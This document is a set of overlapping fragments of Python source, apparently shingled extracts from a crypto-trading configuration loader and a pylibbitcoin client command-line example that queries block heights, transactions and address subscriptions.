"get_config_base(self, state, key): try: result = self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result)) return result except",
"key): try: result = self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result)) return result except KeyError: logger.error(KeyError)",
"= ConfigParser() parser.optionxform = str # make option names case sensitive for file_name",
"pprint(self.__config_dict) def get_config_base(self, state, key): try: result = self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result)) return",
"else: ret = self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot find %s precision: %s %s, using",
"self.get_float_config(cfg_name) else: ret = self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot find %s precision: %s %s,",
"result = file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name) if not found: raise ValueError('No config file",
"print(__name__) logger = logging.getLogger(__name__) section_names = 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex',",
"import collections import logging from configparser import ConfigParser from pprint import pprint import",
"ValueError('No config file found!') for name in section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict) def",
"str # make option names case sensitive for file_name in file_names: found =",
"import Util # logging.basicConfig(level=logging.INFO) # print(__name__) logger = logging.getLogger(__name__) section_names = 'fortest', 'datadog',",
"'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions' class MyConfiguration(): __config_dict",
"= parser.read(file_name) raw_file_name = result = file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name) if not found:",
"= \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try: ret = None if meta == 'min_amount': ret",
"% (meta, name.lower(), symbol.lower())) finally: return_list.append(ret) return return_list cfg = MyConfiguration(os.path.join(os.path.dirname(__file__), '../config/dev.cfg'), os.path.join(os.path.dirname(__file__),",
"result = self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result)) return result except KeyError: logger.error(KeyError) def get_config(self,",
"key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self, key): return int(self.get_config(key)) def get_float_config(self, key): return",
"import pprint import os from dquant.constants import Constants from dquant.util import Util #",
"__config_dict = collections.defaultdict(dict) def __init__(self, *file_names): parser = ConfigParser() parser.optionxform = str #",
"cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try: ret = None if meta == 'min_amount':",
"default\" % (meta, name.lower(), symbol.lower())) finally: return_list.append(ret) return return_list cfg = MyConfiguration(os.path.join(os.path.dirname(__file__), '../config/dev.cfg'),",
"key): return int(self.get_config(key)) def get_float_config(self, key): return float(self.get_config(key)) def get_bool_config(self, key): return self.get_config(key)",
"try: result = self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result)) return result except KeyError: logger.error(KeyError) def",
"in file_names: found = parser.read(file_name) raw_file_name = result = file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name)",
"if meta == 'min_amount': ret = self.get_float_config(cfg_name) else: ret = self.get_int_config(cfg_name) except Exception:",
"return self.get_config(key) == 'true' or self.get_config(key) == 'True' def get_precisions(self, name, symbol): #",
"option names case sensitive for file_name in file_names: found = parser.read(file_name) raw_file_name =",
"result={}\".format(key, result)) return result except KeyError: logger.error(KeyError) def get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key)",
"get_precisions(self, name, symbol): # bitfinex_ethusdt_amount metas = ['min_amount', 'price', 'amount'] return_list = []",
"name, symbol): # bitfinex_ethusdt_amount metas = ['min_amount', 'price', 'amount'] return_list = [] for",
"ret = self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot find %s precision: %s %s, using default\"",
"def get_precisions(self, name, symbol): # bitfinex_ethusdt_amount metas = ['min_amount', 'price', 'amount'] return_list =",
"logging from configparser import ConfigParser from pprint import pprint import os from dquant.constants",
"for name in section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict) def get_config_base(self, state, key): try:",
"logger = logging.getLogger(__name__) section_names = 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance',",
"= 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor',",
"symbol): # bitfinex_ethusdt_amount metas = ['min_amount', 'price', 'amount'] return_list = [] for meta",
"os from dquant.constants import Constants from dquant.util import Util # logging.basicConfig(level=logging.INFO) # print(__name__)",
"'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions' class MyConfiguration(): __config_dict =",
"'huobi', 'redis', 'monitor', 'customized_precisions' class MyConfiguration(): __config_dict = collections.defaultdict(dict) def __init__(self, *file_names): parser",
"group = Util.slice_till_dot(raw_file_name) if not found: raise ValueError('No config file found!') for name",
"== 'true' or self.get_config(key) == 'True' def get_precisions(self, name, symbol): # bitfinex_ethusdt_amount metas",
"logger.error(\"Cannot find %s precision: %s %s, using default\" % (meta, name.lower(), symbol.lower())) finally:",
"import logging from configparser import ConfigParser from pprint import pprint import os from",
"'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions' class MyConfiguration(): __config_dict = collections.defaultdict(dict) def __init__(self, *file_names):",
"metas: cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try: ret = None if meta ==",
"['min_amount', 'price', 'amount'] return_list = [] for meta in metas: cfg_name = \"{}_{}_{}\".format(name.lower(),",
"'true' or self.get_config(key) == 'True' def get_precisions(self, name, symbol): # bitfinex_ethusdt_amount metas =",
"'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions' class MyConfiguration(): __config_dict = collections.defaultdict(dict) def __init__(self,",
"raw_file_name = result = file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name) if not found: raise ValueError('No",
"return float(self.get_config(key)) def get_bool_config(self, key): return self.get_config(key) == 'true' or self.get_config(key) == 'True'",
"make option names case sensitive for file_name in file_names: found = parser.read(file_name) raw_file_name",
"result)) return result except KeyError: logger.error(KeyError) def get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def",
"sensitive for file_name in file_names: found = parser.read(file_name) raw_file_name = result = file_name.split('/')[-1]",
"import ConfigParser from pprint import pprint import os from dquant.constants import Constants from",
"KeyError: logger.error(KeyError) def get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self, key): return int(self.get_config(key))",
"self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self, key): return int(self.get_config(key)) def get_float_config(self, key): return float(self.get_config(key)) def",
"meta in metas: cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try: ret = None if",
"self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict) def get_config_base(self, state, key): try: result = self.__config_dict[state][key] logger.info(\"key={},",
"state, key): try: result = self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result)) return result except KeyError:",
"= self.get_float_config(cfg_name) else: ret = self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot find %s precision: %s",
"'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions' class MyConfiguration():",
"Util # logging.basicConfig(level=logging.INFO) # print(__name__) logger = logging.getLogger(__name__) section_names = 'fortest', 'datadog', 'influxdb',",
"'monitor', 'customized_precisions' class MyConfiguration(): __config_dict = collections.defaultdict(dict) def __init__(self, *file_names): parser = ConfigParser()",
"for file_name in file_names: found = parser.read(file_name) raw_file_name = result = file_name.split('/')[-1] group",
"found!') for name in section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict) def get_config_base(self, state, key):",
"in metas: cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try: ret = None if meta",
"self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot find %s precision: %s %s, using default\" % (meta,",
"names case sensitive for file_name in file_names: found = parser.read(file_name) raw_file_name = result",
"= logging.getLogger(__name__) section_names = 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo',",
"def get_config_base(self, state, key): try: result = self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result)) return result",
"from dquant.util import Util # logging.basicConfig(level=logging.INFO) # print(__name__) logger = logging.getLogger(__name__) section_names =",
"'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions' class MyConfiguration(): __config_dict = collections.defaultdict(dict)",
"or self.get_config(key) == 'True' def get_precisions(self, name, symbol): # bitfinex_ethusdt_amount metas = ['min_amount',",
"int(self.get_config(key)) def get_float_config(self, key): return float(self.get_config(key)) def get_bool_config(self, key): return self.get_config(key) == 'true'",
"def get_int_config(self, key): return int(self.get_config(key)) def get_float_config(self, key): return float(self.get_config(key)) def get_bool_config(self, key):",
"%s precision: %s %s, using default\" % (meta, name.lower(), symbol.lower())) finally: return_list.append(ret) return",
"MyConfiguration(): __config_dict = collections.defaultdict(dict) def __init__(self, *file_names): parser = ConfigParser() parser.optionxform = str",
"'amount'] return_list = [] for meta in metas: cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta)",
"metas = ['min_amount', 'price', 'amount'] return_list = [] for meta in metas: cfg_name",
"== 'min_amount': ret = self.get_float_config(cfg_name) else: ret = self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot find",
"meta) try: ret = None if meta == 'min_amount': ret = self.get_float_config(cfg_name) else:",
"None if meta == 'min_amount': ret = self.get_float_config(cfg_name) else: ret = self.get_int_config(cfg_name) except",
"config file found!') for name in section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict) def get_config_base(self,",
"get_bool_config(self, key): return self.get_config(key) == 'true' or self.get_config(key) == 'True' def get_precisions(self, name,",
"section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict) def get_config_base(self, state, key): try: result = self.__config_dict[state][key]",
"key): return self.get_config(key) == 'true' or self.get_config(key) == 'True' def get_precisions(self, name, symbol):",
"ConfigParser() parser.optionxform = str # make option names case sensitive for file_name in",
"configparser import ConfigParser from pprint import pprint import os from dquant.constants import Constants",
"= self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result)) return result except KeyError: logger.error(KeyError) def get_config(self, key):",
"file_names: found = parser.read(file_name) raw_file_name = result = file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name) if",
"= Util.slice_till_dot(raw_file_name) if not found: raise ValueError('No config file found!') for name in",
"key): return float(self.get_config(key)) def get_bool_config(self, key): return self.get_config(key) == 'true' or self.get_config(key) ==",
"ConfigParser from pprint import pprint import os from dquant.constants import Constants from dquant.util",
"return_list = [] for meta in metas: cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try:",
"= [] for meta in metas: cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try: ret",
"try: ret = None if meta == 'min_amount': ret = self.get_float_config(cfg_name) else: ret",
"found = parser.read(file_name) raw_file_name = result = file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name) if not",
"precision: %s %s, using default\" % (meta, name.lower(), symbol.lower())) finally: return_list.append(ret) return return_list",
"= file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name) if not found: raise ValueError('No config file found!')",
"logging.getLogger(__name__) section_names = 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi',",
"find %s precision: %s %s, using default\" % (meta, name.lower(), symbol.lower())) finally: return_list.append(ret)",
"%s, using default\" % (meta, name.lower(), symbol.lower())) finally: return_list.append(ret) return return_list cfg =",
"'True' def get_precisions(self, name, symbol): # bitfinex_ethusdt_amount metas = ['min_amount', 'price', 'amount'] return_list",
"logger.error(KeyError) def get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self, key): return int(self.get_config(key)) def",
"'customized_precisions' class MyConfiguration(): __config_dict = collections.defaultdict(dict) def __init__(self, *file_names): parser = ConfigParser() parser.optionxform",
"section_names = 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis',",
"Util.slice_till_dot(raw_file_name) if not found: raise ValueError('No config file found!') for name in section_names:",
"get_float_config(self, key): return float(self.get_config(key)) def get_bool_config(self, key): return self.get_config(key) == 'true' or self.get_config(key)",
"[] for meta in metas: cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try: ret =",
"<filename>Arbitrage_Spot/dquant/config.py import collections import logging from configparser import ConfigParser from pprint import pprint",
"from pprint import pprint import os from dquant.constants import Constants from dquant.util import",
"collections.defaultdict(dict) def __init__(self, *file_names): parser = ConfigParser() parser.optionxform = str # make option",
"def get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self, key): return int(self.get_config(key)) def get_float_config(self,",
"get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self, key): return int(self.get_config(key)) def get_float_config(self, key):",
"# make option names case sensitive for file_name in file_names: found = parser.read(file_name)",
"'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions' class",
"result except KeyError: logger.error(KeyError) def get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self, key):",
"def get_bool_config(self, key): return self.get_config(key) == 'true' or self.get_config(key) == 'True' def get_precisions(self,",
"ret = self.get_float_config(cfg_name) else: ret = self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot find %s precision:",
"raise ValueError('No config file found!') for name in section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict)",
"= result = file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name) if not found: raise ValueError('No config",
"except KeyError: logger.error(KeyError) def get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self, key): return",
"float(self.get_config(key)) def get_bool_config(self, key): return self.get_config(key) == 'true' or self.get_config(key) == 'True' def",
"'min_amount': ret = self.get_float_config(cfg_name) else: ret = self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot find %s",
"using default\" % (meta, name.lower(), symbol.lower())) finally: return_list.append(ret) return return_list cfg = MyConfiguration(os.path.join(os.path.dirname(__file__),",
"(meta, name.lower(), symbol.lower())) finally: return_list.append(ret) return return_list cfg = MyConfiguration(os.path.join(os.path.dirname(__file__), '../config/dev.cfg'), os.path.join(os.path.dirname(__file__), '../config/pro.cfg'))",
"return int(self.get_config(key)) def get_float_config(self, key): return float(self.get_config(key)) def get_bool_config(self, key): return self.get_config(key) ==",
"from dquant.constants import Constants from dquant.util import Util # logging.basicConfig(level=logging.INFO) # print(__name__) logger",
"= collections.defaultdict(dict) def __init__(self, *file_names): parser = ConfigParser() parser.optionxform = str # make",
"if not found: raise ValueError('No config file found!') for name in section_names: self.__config_dict[group].update(parser.items(name))",
"collections import logging from configparser import ConfigParser from pprint import pprint import os",
"import os from dquant.constants import Constants from dquant.util import Util # logging.basicConfig(level=logging.INFO) #",
"parser = ConfigParser() parser.optionxform = str # make option names case sensitive for"
] |
[
"return client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2] index = int(sys.argv[3]) return client.spend(hash, index)",
"block_transaction_hashes, } def main(): if len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0])",
"sanity check a client should probably do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2]))",
"int(sys.argv[3]) return client.spend(hash, index) async def subscribe_address(client): address = sys.argv[2] return await client.subscribe_address(address)",
"9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result =",
"\"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result:",
"if len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command = sys.argv[1] if",
"asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses)) loop.close() if",
"= pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop()",
"9092, \"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error",
"def broadcast(client): # Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 #",
"client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2] index = int(sys.argv[3]) return client.spend(hash, index) async",
"if command not in commands: sys.exit(\"Command can be %s\" % str.join(\", \", iter(commands)))",
"async def history3(client): address = sys.argv[2] start_height = 10_000 return await client.history3(address, start_height)",
"raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might seem odd but",
"print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending",
"9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code))",
"pylibbitcoin.client def block_header(client): index = sys.argv[2] return client.block_header(int(index)) def last_height(client): return client.last_height() def",
"bitcoin.core import pylibbitcoin.client def block_header(client): index = sys.argv[2] return client.block_header(int(index)) def last_height(client): return",
"client.subscribe_address(address) async def _read_from(queue): while True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2]",
"subscribe_address(client): address = sys.argv[2] return await client.subscribe_address(address) async def _read_from(queue): while True: print(await",
"# client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\":",
"transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes,",
"index) async def subscribe_address(client): address = sys.argv[2] return await client.subscribe_address(address) async def _read_from(queue):",
"sys.argv[2] return await client.subscribe_address(address) async def _read_from(queue): while True: print(await queue.get()) def unsubscribe_address(client):",
"spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, } def",
"but this is a sanity check a client should probably do. # noqa:",
"block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address,",
"def block_header(client): index = sys.argv[2] return client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client):",
"= sys.argv[2] return await client.subscribe_address(address) async def _read_from(queue): while True: print(await queue.get()) def",
"sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command = sys.argv[1] if command not in commands:",
"% sys.argv[0]) command = sys.argv[1] if command not in commands: sys.exit(\"Command can be",
"return client.transaction(hash) def transaction_index(client): hash = sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client): height =",
"\"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\":",
"= asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result)",
"< 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command = sys.argv[1] if command not",
"sys.argv[2] return client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client): hash = sys.argv[2] return",
"main(): if len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command = sys.argv[1]",
"print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): # Grab",
"height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2] index = int(sys.argv[3])",
"return await client.subscribe_address(address) async def _read_from(queue): while True: print(await queue.get()) def unsubscribe_address(client): address",
"%s last_height|block_header|<cmd>\" % sys.argv[0]) command = sys.argv[1] if command not in commands: sys.exit(\"Command",
"sys.argv[2] return client.block_height(hash) def transaction(client): hash = sys.argv[2] return client.transaction(hash) def transaction_index(client): hash",
"last_height(client): return client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash) def transaction(client): hash",
"sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash",
"loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses)) loop.close() if __name__",
"def spend(client): hash = sys.argv[2] index = int(sys.argv[3]) return client.spend(hash, index) async def",
"return client.spend(hash, index) async def subscribe_address(client): address = sys.argv[2] return await client.subscribe_address(address) async",
"address = sys.argv[2] start_height = 10_000 return await client.history3(address, start_height) commands = {",
"%s\" % str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client =",
"might seem odd but this is a sanity check a client should probably",
"hash = sys.argv[2] return client.block_height(hash) def transaction(client): hash = sys.argv[2] return client.transaction(hash) def",
"= sys.argv[2] return client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client): hash = sys.argv[2]",
"last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address,",
"await client.subscribe_address(address) async def _read_from(queue): while True: print(await queue.get()) def unsubscribe_address(client): address =",
"queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): # Grab a",
"broadcast(client): # Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This",
"start_height = 10_000 return await client.history3(address, start_height) commands = { \"last_height\": last_height, \"block_header\":",
"sys.argv[2] index = int(sys.argv[3]) return client.spend(hash, index) async def subscribe_address(client): address = sys.argv[2]",
"\"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, } def main():",
"async def subscribe_address(client): address = sys.argv[2] return await client.subscribe_address(address) async def _read_from(queue): while",
"history3, \"block_transaction_hashes\": block_transaction_hashes, } def main(): if len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\"",
"# client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093,",
"async def _read_from(queue): while True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return",
"E501 # This might seem odd but this is a sanity check a",
"address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): # Grab a raw block from",
"E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address = sys.argv[2] start_height",
"pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop",
"a client should probably do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize()))",
"index = sys.argv[2] return client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client): hash =",
"client should probably do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async",
"last_height|block_header|<cmd>\" % sys.argv[0]) command = sys.argv[1] if command not in commands: sys.exit(\"Command can",
"transaction_index(client): hash = sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height)",
"client.unsubscribe_address(address) def broadcast(client): # Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501",
"client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash) def transaction(client): hash = sys.argv[2]",
"def block_height(client): hash = sys.argv[2] return client.block_height(hash) def transaction(client): hash = sys.argv[2] return",
"Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might seem",
"This might seem odd but this is a sanity check a client should",
"= bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address = sys.argv[2] start_height = 10_000",
"sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): # Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex #",
"= 10_000 return await client.history3(address, start_height) commands = { \"last_height\": last_height, \"block_header\": block_header,",
"} def main(): if len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command",
"code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number",
"hash = sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def",
"return client.unsubscribe_address(address) def broadcast(client): # Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa:",
"{ \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend,",
"\"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, } def main(): if len(sys.argv)",
"in commands: sys.exit(\"Command can be %s\" % str.join(\", \", iter(commands))) # client =",
"this is a sanity check a client should probably do. # noqa: E501",
"10_000 return await client.history3(address, start_height) commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\":",
"pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092,",
"def transaction_index(client): hash = sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2]) return",
"binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index = sys.argv[2] return client.block_header(int(index)) def",
"= sys.argv[2] index = int(sys.argv[3]) return client.spend(hash, index) async def subscribe_address(client): address =",
"client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address = sys.argv[2] start_height = 10_000 return await client.history3(address,",
"from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might seem odd but this is",
"# noqa: E501 # This might seem odd but this is a sanity",
"\"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, } def main(): if len(sys.argv) < 2: sys.exit(\"Usage: %s",
"hash = sys.argv[2] return client.transaction(hash) def transaction_index(client): hash = sys.argv[2] return client.transaction_index(hash) def",
"client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2]",
"= int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2] index = int(sys.argv[3]) return",
"noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address = sys.argv[2]",
"transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3,",
"client.transaction(hash) def transaction_index(client): hash = sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2])",
"sys.argv[0]) command = sys.argv[1] if command not in commands: sys.exit(\"Command can be %s\"",
"client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\":",
"transaction(client): hash = sys.argv[2] return client.transaction(hash) def transaction_index(client): hash = sys.argv[2] return client.transaction_index(hash)",
